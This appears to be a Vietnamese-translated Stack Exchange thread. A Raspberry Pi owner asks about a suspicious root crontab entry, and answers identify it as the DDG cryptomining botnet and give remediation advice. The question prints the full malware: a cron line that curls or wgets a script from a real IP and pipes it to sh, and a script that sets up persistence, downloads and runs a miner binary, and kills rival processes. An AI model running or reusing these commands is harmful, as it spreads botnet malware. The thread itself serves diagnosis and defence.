Mục nhập crontab đáng ngờ đang chạy 'xribfa4' cứ sau 15 phút


59

Tôi muốn thêm một cái gì đó vào tập tin crontab gốc của mình trên Raspberry Pi và tìm thấy một mục có vẻ đáng ngờ đối với tôi, tìm kiếm các phần của nó trên Google không tìm thấy gì.

Mục Crontab:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

Nội dung của http://103.219.112.66:8000/i.sh:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

Kiến thức Linux của tôi còn hạn chế, nhưng đối với tôi, dường như việc tải xuống các tệp nhị phân từ máy chủ Indonesia và chạy chúng dưới quyền root thường xuyên không phải là điều bình thường.

Cái gì thế này? Tôi nên làm gì?


16
Đó là thông tư. Cứ sau 15 phút, nó tải xuống và cài đặt một bản sao mới. Nếu / khi bản sao trên máy chủ từ xa bị thay đổi, tất cả các máy chủ chạy cronjob này sẽ thực thi bất kỳ mã mới nào, trong vòng 15 phút.
tự đại diện

5
Là pi mâm xôi của bạn mở cho internet? Raspberry pi của bạn đang chạy là gì? Đây là kết quả duy nhất trên google khi tôi tìm kiếm xribfa4. Nếu bạn không chạy phần mềm cần làm điều này thì đây có khả năng là virus.
kemotep

6
@kemotep chuỗi đó là ngẫu nhiên, nhưng google cho IP và nó cho một vài kết quả. Đôi điều về botnet khai thác
ddg

9
Tôi tìm thấy nó. Thật điên rồ khi IP được đăng ký vào một trang web của Chính phủ Indonesia. Cũng có vẻ như có gần 2000 ips khác cung cấp tải trọng này.
kemotep

21
Điều chính bạn phải nhận thức được là ngay cả khi bạn loại bỏ mục crontab đó, rất có thể hệ thống của bạn vẫn có lỗ hổng cho phép nó bị nhiễm. Bạn cần tìm và sửa lỗ hổng đó.
Hans-Martin Mosner

Câu trả lời:


79

Nó là một botnet khai thác DDG, làm thế nào nó hoạt động:

  1. khai thác lỗ hổng RCE
  2. sửa đổi crontab
  3. tải về chương trình khai thác thích hợp (viết bằng go)
  4. bắt đầu quá trình khai thác

DDG: Một Botnet khai thác nhắm vào máy chủ cơ sở dữ liệu

SystemdMiner khi botnet mượn cơ sở hạ tầng của botnet khác

U & L: Làm cách nào tôi có thể tiêu diệt phần mềm độc hại khai thác trên phiên bản AWS EC2? (máy chủ bị xâm nhập)


4
Vâng, có vẻ như đây là nó. Cảm ơn! Sẽ đánh dấu đây là một câu trả lời, nếu không có gì mới xuất hiện.
Peter Dam

8
Đừng quên lời khuyên thông thường cho một máy đã root: hãy thử và tìm hiểu xem chúng đã vào như thế nào để bạn có thể sửa lỗ hổng. Học hỏi từ điều này, và tăng cường bảo mật của bạn. Cuối cùng, nuke và cài đặt lại máy.
marcelm

3
Tin vui là họ dường như không có công cụ khai thác cho Pi, chỉ dành cho i686 và x86_64.
Đánh dấu

13
@Mark Làm thế nào là tin tốt? Ai đó đã giành được toàn quyền kiểm soát Pi của mình bằng cách sử dụng một điểm vào không xác định và có toàn quyền truy cập vào bất kỳ bí mật nào trên Pi (bao gồm nhưng không giới hạn mật khẩu). Việc người khai thác có chạy hay không thực sự nằm trong "sự bất tiện nhỏ".
marcelm

4
@marcelm, kẻ tấn công đã giành được toàn quyền kiểm soát nó, và sau đó gần như chắc chắn không làm gì đáng kể với sự kiểm soát đó.
Đánh dấu

2

Chỉ ra các cổng TCP và UDP thực sự cần thiết, sau đó chặn tất cả các cổng khác trong tường lửa của bộ định tuyến của bạn. Có thể , những mục crontab sẽ không xuất hiện lại.

Bạn có thể xem cổng nào được mở và công khai bằng cách sử dụng Shields Up! tính năng tại grc.com .


5
Hoặc anh ta có thể vá lỗ hổng.
Harper - Tái lập lại

1
@Harper Tuyệt đối! Đó là sự cống hiến. Tôi đã nghĩ rằng có lẽ nếu không chặn các cổng không sử dụng trước, nó có thể bị nhiễm lại trong khi anh ta đang cố gắng vá nó.
Mike Waters

1
Nhận xét có liên quan từ bảo mật.SE: security.stackexchange.com/questions/147770/iêu
Wildcard

1
Điều này (không giới hạn chỉ TCP và UDP), luôn luôn. Mô hình bảo mật tích cực của Aka, danh sách trắng hoặc từ chối theo mặc định - từ chối tất cả lưu lượng truy cập mà bạn không sử dụng hoặc cần rõ ràng - cách duy nhất để đảm bảo không có lỗ hổng nào của bạn bị lộ.
antichris
Khi sử dụng trang web của chúng tôi, bạn xác nhận rằng bạn đã đọc và hiểu Chính sách cookieChính sách bảo mật của chúng tôi.
Licensed under cc by-sa 3.0 with attribution required.